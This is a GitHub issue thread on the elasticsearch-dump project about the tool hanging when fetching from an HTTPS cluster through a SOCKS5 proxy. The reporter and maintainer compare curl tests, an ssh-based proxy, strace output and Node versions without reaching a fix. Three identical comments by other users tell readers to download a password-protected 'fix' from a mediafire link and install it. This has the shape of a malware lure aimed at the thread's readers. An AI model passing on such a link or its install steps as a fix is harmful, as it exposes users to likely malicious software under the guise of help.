### ISSUE TITLE
[BUG] Connection hang when fetching data via https + socks5 proxy 

### ISSUE THREAD

**Issue by icy** [elasticsearch-dump/elasticsearch-dump#1046]
**Context**
In order to help us troubleshoot issues with this project, you **must** provide the following details:

- ElasticDump version: 6.111.0
- Elasticsearch version: 8.10.2
- Node.js version *22.7.0
- Full command you are having issue with (with inputs and outputs)

```
elasticdump --type=settings --debug=true --inputSocksProxy=127.0.0.1 \
   --inputSocksPort=3333 --input=https://example.net/.security --output='$' --maxSockets=5
```

**Describe the bug**

 The command hangs

**Current behavior**

 The command hangs

**Expected behavior**

Elasticdump can be connected to the https ES cluster  via socks5 proxy

**Screenshots**

N/A

**Additional context**

Probably due to this https://github.com/mattcg/socks5-https-client/issues/22

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by icy** [comment]
> > A good bug report shouldn't leave others needing to chase you up for more information. Please try to be as detailed as possible in your report. What is your environment? What was the url? What steps will reproduce the issue? What OS experience the problem? All these details will help to fix any potential bugs as soon as possible.
> 
> I can't ascertain anything from what is shown above or even determine if the issue is as stated. Need more info here

Hi @ferronrsmith  , when socks configuration is given (`--inputSocksProxy=127.0.0.1 --inputSocksPort=3333 `), elasticdump can't initialize any connection to the upstream.  What kind of information you need more? 

My socks5 proxy listens on 127.0.0.1:3333 and it works well with other applications, for example `curl`: This command works well :

```
curl --proxy socks5://127.0.0.1:3333 https://example.net/.security
```

**Comment by icy** [comment]
I can confirm that my socks proxy server doesn't support socks4 . It only accepts socks5. 

From our code https://github.com/elasticsearch-dump/elasticsearch-dump/blob/68907277608f505343880d50a219931926f81731/lib/request.js#L2, I understand our tool supports out socks5 out of the box. 

Please correct me if I'm wrong and let me know if you need any information that'd be helpful to figure out the cause. 

Thanks a lot.

**Comment by icy** [comment]
I have also created a simple socks4/socks5 proxy by using ssh. `curl` works well with this proxy server. The ssh connection will route local traffic to a bastion node which has direct connection to our ES cluster

```
$ ssh bastion_node -D 4444 -fN # create a socks 4/5 proxy on the background

$ curl --proxy socks4://127.0.0.1:4444 https://example.net/.security  # return http return code 401 due to ES authentication config

$ curl --proxy socks5://127.0.0.1:4444 https://example.net/.security  # return http return code 401 due to ES authentication config

$ elasticdump --type=template --debug=true --inputSocksProxy=127.0.0.1 --inputSocksPort=4444 --input=https://example.net/_template --output='$' 
(node:544229) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.
(Use `node --trace-deprecation ...` to show where the warning was created)
# it hangs here...
```

**Comment by ferronrsmith** [comment]
https://github.com/elasticsearch-dump/elasticsearch-dump/pull/1049

Test and working file for me.

**Comment by icy** [comment]
> Tested this with my own socks5 server and everything works. I can't introduce a new library, especially with a compiled dependency since this affects everything and potential impact on other areas.

Did you have a test with ES with HTTPs endpoint/

Do you have any suggestion how to fix this problem from my side? and/or any work-around ?

> A good bug report shouldn't leave others needing to chase you up for more information.

I was looking at your tests/CI if there is any test for socks/https, I don't think we had. So I tried to turn on `--debug` but the program didn't emit anything useful, but as you can see, the program didn't print anything useful. 

I spent a lot of time on this before raising the report, because I initially though it's due to my network issue until I could confirm I had no issue with `curl` + socks server when accessing my ES system.

I also used `strace` to see how things we were working. What I saw was that elasticdump was waiting for the remote's answer after elasticdump writes some initial packets into the open socket. The waiting info is shown as below. I thought it's kinda protocol mismatching.

I don't really think it's due to socks server (which is provided by `ssh -D`), but I have no idea what is mixed up on the wire.

```
...
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
write(22, "\1\0\0\0\0\0\0\0", 8)        = 8
epoll_pwait(17, [{events=EPOLLIN, data={u32=22, u64=22}}], 1024, 0, NULL, 8) = 1
read(22, "\1\0\0\0\0\0\0\0", 1024)      = 8
epoll_pwait(17, [], 1024, 0, NULL, 8)   = 0
epoll_pwait(17, 
[icy] 0:bash- 1:bash  2:bash  3:strace*                                                                                                                                                                      "kyanh.lauxanh.vn" 08:36 30-Aug-24


```

**Comment by ferronrsmith** [comment]
It could be the node version, but I haven't really dug into it that deep. I test everything on node v10 or v14. These libraries aren't doing anything special, just a agent wrap that calls a service. Maybe i am doing something incorrect, but everything seems to be fine. Maybe if I had the same sock5 server as you I could replicate. I am using `node-socks5-server`, beyond that I don't think it's anything to do with code.

**Comment by ferronrsmith** [comment]
OpenSSH_9.8p1, OpenSSL 3.3.1 4 Jun 2024

tested with the ssh socks proxy and everything works for me.

**Comment by icy** [comment]
I've `Node.js v22.7.0` on my linux machine. I will try some older version next week. I will keep you posted. Thanks and nice weekend.

**Comment by ferronrsmith** [comment]
I don't think it's the node version. Think it's more than link the ssh socket, tested on both node v15 and v22 and it works for me. Hard to fix something i can't replicate

**Comment by icy** [comment]
> I don't think it's the node version. Think it's more than link the ssh socket, tested on both node v15 and v22 and it works for me. Hard to fix something i can't replicate

maybe there is some issue with http/https server? My ES is running behind a OCI load balancer (created by some k8s ingress). I've looked into the response header from curl, it's mentioing http2.

```
curl --proxy socks5://127.0.0.1:3333 https://example.net/ -I
HTTP/2 401 
date: Wed, 11 Sep 2024 13:25:24 GMT
content-type: application/json
content-length: 407
www-authenticate: Basic realm="security" charset="UTF-8"
www-authenticate: ApiKey
strict-transport-security: max-age=15724800; includeSubDomains
```

I will try some different theory. I'm not really focusing on this, as I have to switch my work context. When I have more updates, I will keep you posted. 

Thanks.

**Comment by ferronrsmith** [comment]
If you can access it via curl then it should not be the http(s) server. Very hard to say without proper logging unfortunately. I hesitant to import an additional dependency to solve an issue that might be solvable by something simple
